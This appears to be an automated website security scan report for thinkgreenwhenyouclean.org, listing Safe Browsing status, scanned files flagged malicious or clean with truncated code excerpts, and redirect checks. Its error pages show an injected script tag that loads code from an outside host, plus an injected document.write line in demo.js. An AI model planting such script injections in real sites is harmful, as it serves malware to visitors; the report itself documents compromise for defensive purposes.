Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thinkgreenwhenyouclean.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.thinkgreenwhenyouclean.org/ | 200 OK Content-Length: 7971 Content-Type: text/html | clean |
http://www.thinkgreenwhenyouclean.org/javascripts/jquery.js | 200 OK Content-Length: 80596 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o )e(a[o],b,f?d.call(a[o] Antivirus reports:
| ||
http://www.thinkgreenwhenyouclean.org/javascripts/jquery.tools.js | 200 OK Content-Length: 14557 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e){function p(f,c){var b=e(c);return b.length<2?b:f.parent().find(c)}function u(f,c){var b=this,n=f.add(b),g=f.children(),l=0,j=c.vertical;k||(k=b);if(g.length>1)g=e(c.items,f);e.extend(b,{getConf:function(){return c},getIndex:function(){return l},getSize:function(){return b.getItems().size()},getNaviButtons:function(){return o.add(q)},getRoot:function(){return f},getItemWrap:function(){return g},getItems:function(){return g.children(c.item).not("." c.clonedClass)},move:function( Antivirus reports:
| ||
http://www.thinkgreenwhenyouclean.org/javascripts/jquery.prettyPhoto.js | 200 OK Content-Length: 29582 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.prettyPhoto={version:'3.0'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({animation_speed:'fast',slideshow:false,autoplay_slideshow:false,opacity:0.80,show_title:true,allow_resize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'facebook',hideflash:false,wmode:'opaque',autoplay:true,modal:false,overlay_gallery:true,keyboard_shortcuts:true,changepicturecallback:function(){},callback:function(){},markup:'<div class="pp_pic_holder"&g Antivirus reports:
| ||
http://www.thinkgreenwhenyouclean.org/jcart/jcart-javascript.min.php | 200 OK Content-Length: 2798 Content-Type: application/x-javascript | clean |
http://www.thinkgreenwhenyouclean.org/javascripts/site.js | 200 OK Content-Length: 10953 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $("div#header li.active a").css({ '-moz-border-radius': '6px', '-webkit-border-radius': '6px', 'border-radius': '6px' }); $("div.sidebar_box").css({ '-moz-border-radius': '8px', '-webkit-border-radius': '8px', 'border-radius': '8px' }); $("div#price_table table").css({ '-moz-border-radius': '8px', '-webkit-border-radius': '8px', 'border-radius': '8px' }); $("span.highlight_dark, span.highlight_light").css({ '-moz-border-radius': '2px', '- Antivirus reports:
| ||
http://www.thinkgreenwhenyouclean.org/javascripts/demo.js | 200 OK Content-Length: 4691 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { var c = readCookie('freshserve_style'); if (c) switchStylesheet(c); $("#theme_colors ul li").click(function() { switchStylesheet($(this).attr("class")); }); $(".show_switcher").hover(function() { $(this).hide(); $(".color_picker").fadeIn(200); }); $(".color_picker").mouseleave(function() { $(this).fadeOut(200); $(".show_switcher").delay(200).fadeIn(200); }); }); functio document.write('<img src="http://localhost/" >'); Antivirus reports:
| ||
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 150791 Content-Type: application/x-javascript | clean |
http://www.thinkgreenwhenyouclean.org/index.html | 404 Not Found Content-Length: 2818 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://superfastlinux.com/9gxmnz3p.php?id="></script> | ||
http://www.thinkgreenwhenyouclean.org/test404page.js | 404 Not Found Content-Length: 2818 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://superfastlinux.com/9gxmnz3p.php?id="></script> | ||
http://www.thinkgreenwhenyouclean.org/index.php | 200 OK Content-Length: 7971 Content-Type: text/html | clean |
http://www.thinkgreenwhenyouclean.org/checkout.php | 200 OK Content-Length: 5308 Content-Type: text/html | clean |
http://www.thinkgreenwhenyouclean.org/how-it-works.php | 200 OK Content-Length: 8717 Content-Type: text/html | clean |
http://www.thinkgreenwhenyouclean.org/product-videos.php | 200 OK Content-Length: 8347 Content-Type: text/html | clean |
http://www.thinkgreenwhenyouclean.org/about.php | 200 OK Content-Length: 9053 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thinkgreenwhenyouclean.org
Result:
GET / HTTP/1.1
Host: thinkgreenwhenyouclean.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: thinkgreenwhenyouclean.org
Referer: http://www.google.com/search?q=thinkgreenwhenyouclean.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thinkgreenwhenyouclean.org
Referer: http://www.google.com/search?q=thinkgreenwhenyouclean.org
Result:
The result is similar to the first query. There are no suspicious redirects found.